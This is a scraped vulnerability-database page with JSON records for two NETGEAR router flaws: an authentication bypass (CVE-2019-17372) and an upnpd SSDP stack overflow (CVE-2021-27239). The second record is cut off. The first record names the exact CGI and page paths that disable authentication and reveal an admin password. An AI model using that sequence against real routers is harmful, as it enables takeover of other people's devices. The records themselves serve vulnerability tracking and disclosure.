"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201910-1260",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wnr1000v3",
"scope": "eq",
"trust": 2.2,
"vendor": "netgear",
"version": null
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 2.2,
"vendor": "netgear",
"version": null
},
{
"model": "wndr4500v2",
"scope": "eq",
"trust": 2.2,
"vendor": "netgear",
"version": null
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 2.2,
"vendor": "netgear",
"version": null
},
{
"model": "wnr1000",
"scope": "eq",
"trust": 2.2,
"vendor": "netgear",
"version": null
},
{
"model": "r6900p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "wndr4000",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r4500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "lg2200d",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "d8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r6300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "dc112a",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r7900",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r7000",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r6250",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r6700",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "wgr614v10",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r8000",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r8300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "jndr3000",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "ac1450",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r6200",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r6300v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r6400",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "wn2500rpv2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "wndr3700v3",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r6900",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r6200v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "r7300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "wndr3400v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": null
},
{
"model": "ac1450",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "d8500",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "dc112a",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "jndr3000",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "lg2200d",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "r4500",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "r6200",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "r6200v2",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "r6250",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "r6300",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "ac1450",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "d8500",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "dc112a",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "jndr3000",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "lg2200d",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r4500",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r6200",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r6200v2",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r6250",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r6300",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r6300v2",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r6400",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r6700",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r6900p",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r6900",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r7000",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r7100lg",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r7300",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r7900",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r8000",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "r8300",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23147"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011047"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-510"
},
{
"db": "NVD",
"id": "CVE-2019-17372"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:ac1450_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dc112a_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:jndr3000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:lg2200d_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r4500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6200v2_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-011047"
}
]
},
"cve": "CVE-2019-17372",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2019-17372",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-23147",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2019-17372",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-17372",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-17372",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-17372",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-23147",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201910-510",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23147"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011047"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-510"
},
{
"db": "NVD",
"id": "CVE-2019-17372"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices allow remote attackers to disable all authentication requirements by visiting genieDisableLanChanged.cgi. The attacker can then, for example, visit MNU_accessPassword_recovered.html to obtain a valid new admin password. This affects AC1450, D8500, DC112A, JNDR3000, LG2200D, R4500, R6200, R6200V2, R6250, R6300, R6300v2, R6400, R6700, R6900P, R6900, R7000P, R7000, R7100LG, R7300, R7900, R8000, R8300, R8500, WGR614v10, WN2500RPv2, WNDR3400v2, WNDR3700v3, WNDR4000, WNDR4500, WNDR4500v2, WNR1000, WNR1000v3, WNR3500L, and WNR3500L. plural NETGEAR The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NETGEAR AC1450, etc. are all wireless routers of NETGEAR. \n\r\n\r\nA number of NETGEAR products have authorization issues. The vulnerability stems from the lack of authentication measures or insufficient authentication strength in network systems or products. There is currently no detailed vulnerability details provided",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-17372"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011047"
},
{
"db": "CNVD",
"id": "CNVD-2020-23147"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-17372",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011047",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-23147",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201910-510",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23147"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011047"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-510"
},
{
"db": "NVD",
"id": "CVE-2019-17372"
}
]
},
"id": "VAR-201910-1260",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23147"
}
],
"trust": 1.1416194088461538
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23147"
}
]
},
"last_update_date": "2024-11-23T22:41:18.875000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.netgear.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-011047"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-011047"
},
{
"db": "NVD",
"id": "CVE-2019-17372"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://github.com/zer0yu/cve_request/blob/master/netgear/netgear_cgi_unauthorized_access_vulnerability.md"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17372"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17372"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23147"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011047"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-510"
},
{
"db": "NVD",
"id": "CVE-2019-17372"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-23147"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-011047"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-510"
},
{
"db": "NVD",
"id": "CVE-2019-17372"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-23147"
},
{
"date": "2019-10-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-011047"
},
{
"date": "2019-10-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-510"
},
{
"date": "2019-10-09T13:15:16.863000",
"db": "NVD",
"id": "CVE-2019-17372"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-23147"
},
{
"date": "2019-10-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-011047"
},
{
"date": "2019-11-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-510"
},
{
"date": "2024-11-21T04:32:12.360000",
"db": "NVD",
"id": "CVE-2019-17372"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-510"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-011047"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-510"
}
],
"trust": 0.6
}
}
var-202103-0938
Vulnerability from variot
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6400 and R6700 firmware version 1.0.4.98 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the upnpd service, which listens on UDP port 1900 by default. A crafted MX header field in an SSDP message can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11851. NETGEAR R6400 and R6700 A stack-based buffer overflow vulnerability exists in the firmware. Zero Day Initiative To this vulnerability ZDI-CAN-11851 Was numbered.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.68"
},
{
"_id": null,
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.38"
},
{
"_id": null,
"model": "rbr750",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "3.2.17.12"
},
{
"_id": null,
"model": "rs400",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.5.0.68"
},
{
"_id": null,
"model": "r6250",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.48"
},
{
"_id": null,
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.68"
},
{
"_id": null,
"model": "rbr850",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "3.2.17.12"
},
{
"_id": null,
"model": "r7850",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.68"
},
{
"_id": null,
"model": "rax80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.102"
},
{
"_id": null,
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"_id": null,
"model": "r7960p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.68"
},
{
"_id": null,
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.102"
},
{
"_id": null,
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"_id": null,
"model": "d8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.60"
},
{
"_id": null,
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"_id": null,
"model": "dc112a",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"_id": null,
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.68"
},
{
"_id": null,
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.102"
},
{
"_id": null,
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.2.132"
},
{
"_id": null,
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.144"
},
{
"_id": null,
"model": "rbs40v",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.6.2.4"
},
{
"_id": null,
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.66"
},
{
"_id": null,
"model": "xr300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.56"
},
{
"_id": null,
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.50"
},
{
"_id": null,
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.11.116"
},
{
"_id": null,
"model": "rbs850",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "3.2.17.12"
},
{
"_id": null,
"model": "ex7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.94"
},
{
"_id": null,
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.68"
},
{
"_id": null,
"model": "rax75",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.102"
},
{
"_id": null,
"model": "rbs750",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "3.2.17.12"
},
{
"_id": null,
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.144"
},
{
"_id": null,
"model": "ex7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"_id": null,
"model": "rax200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.88"
},
{
"_id": null,
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"_id": null,
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.2.132"
},
{
"_id": null,
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.38"
},
{
"_id": null,
"model": "ex7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d6200",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "r6700",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "r6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "r6250",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "ex7500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "dc112a",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "multiple routers",
"scope": null,
"trust": 0.7,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-206"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005006"
},
{
"db": "NVD",
"id": "CVE-2021-27239"
}
]
},
"credits": {
"_id": null,
"data": "Anonymous",
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-206"
}
],
"trust": 0.7
},
"cve": "CVE-2021-27239",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CVE-2021-27239",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2021-27239",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2021-27239",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2021-27239",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-27239",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2021-27239",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-27239",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2021-27239",
"trust": 0.7,
"value": "HIGH"
},
{
